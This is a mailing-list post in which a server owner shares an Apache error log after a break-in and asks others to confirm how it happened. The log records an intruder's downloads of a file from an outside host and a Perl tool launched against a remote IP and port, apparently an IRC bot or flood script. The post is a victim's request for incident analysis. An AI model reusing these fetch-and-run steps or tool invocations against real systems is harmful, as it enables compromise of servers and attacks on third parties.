Analys of an apache log following a hack.

[Gregory Boddin <gregory () g2f be>]

Hello, it's my first mail to the security focus mailing list.
First thanks for this community and your attention.

Well my server was hacked 1 week ago, and I find that in the apache 
error_log.

The system was cleaned after that but I want to know more about this.

I think that someone have used a buffer overflow in httpd (apache) server.

Confirm that?

Thank you very much for answer.

(excuse my english because I m french)

[APACHE ERROR LOG]
[Sun Apr 01 17:08:51 2007] [notice] Apache configured -- resuming normal 
operations
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while 
reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@*****.be(48): unable to execute 
/usr/sbin/postdrop -r: Success
sendmail: fatal: No recipient addresses found in message header
[Mon Apr 02 12:42:58 2007] [error] server reached MaxClients setting, 
consider raising the MaxClients setting
Allowed memory size of 16777216 bytes exhausted (tried to allocate 
8058880 bytes)
--00:05:36--  http://www.r00ting.org/b
          => `b'
Resolving www.r00ting.org... 200.226.246.22
Connecting to www.r00ting.org|200.226.246.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,606 (27K) [text/plain]

   0K .......... .......... ......                          100%   
41.93 KB/s

00:05:37 (41.93 KB/s) - `b' saved [27606/27606]

 % Total    % Received % Xferd  Average Speed   Time    Time     Time  
Current
                                Dload  Upload   Total   Spent    Left  
Speed
100 27606  100 27606    0     0   5315      0  0:00:05  0:00:05 --:--:-- 
72383
sh: lynx: command not found
sh: fetch: command not found
--00:22:32--  http://www.r00ting.org/b
          => `b'
Resolving www.r00ting.org... 200.226.246.22
Connecting to www.r00ting.org|200.226.246.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,606 (27K) [text/plain]

   0K .......... .......... ......                          100%   
58.23 KB/s

00:22:34 (58.23 KB/s) - `b' saved [27606/27606]

 % Total    % Received % Xferd  Average Speed   Time    Time     Time  
Current
                                Dload  Upload   Total   Spent    Left  
Speed
100 27606  100 27606    0     0  33291      0 --:--:-- --:--:-- --:--:-- 
60817
sh: lynx: command not found
sh: fetch: command not found
Undefined subroutine &main::getnick called at b line 304.
sh: line 1:  5148 Killed                  perl p 201.43.174.146 7171 120 
2>&1 3>&1
[Tue Apr 03 10:47:11 2007] [notice] caught SIGTERM, shutting down
[Tue Apr 03 10:47:27 2007] [notice] Apache configured -- resuming normal 
operations
[Tue Apr 03 10:55:36 2007] [error] server reached MaxClients setting, 
consider raising the MaxClients setting
sh: /cd: No such file or directory
sh: /cd: No such file or directory
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while 
reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute 
/usr/sbin/postdrop -r: Success
sh: /cd: No such file or directory
sh: /cd: No such file or directory
sh: /cd: No such file or directory
[Thu Apr 05 15:18:35 2007] [warn] child process 10245 still did not 
exit, sending a SIGTERM
[Thu Apr 05 15:18:35 2007] [warn] child process 10246 still did not 
exit, sending a SIGTERM
[Thu Apr 05 15:20:56 2007] [notice] Apache configured -- resuming normal 
operations
[Thu Apr 05 16:10:09 2007] [error] server reached MaxClients setting, 
consider raising the MaxClients setting
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while 
reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute 
/usr/sbin/postdrop -r: Success
sendmail: fatal: No recipient addresses found in message header
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while 
reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute 
/usr/sbin/postdrop -r: Success
[Fri Apr 06 22:10:26 2007] [notice] caught SIGTERM, shutting down
[Fri Apr 06 22:45:56 2007] [notice] Apache configured -- resuming normal 
operations
[Fri Apr 06 23:50:46 2007] [error] server reached MaxClients setting, 
consider raising the MaxClients setting
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while 
reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute 
/usr/sbin/postdrop -r: Success
[Sun Apr 08 00:43:49 2007] [notice] caught SIGTERM, shutting down
[Sun Apr 08 00:48:00 2007] [notice] Apache configured -- resuming normal 
operations
[Sun Apr 08 02:52:34 2007] [error] server reached MaxClients setting, 
consider raising the MaxClients setting
[/APACHE ERROR LOG]

Thank you.

Greg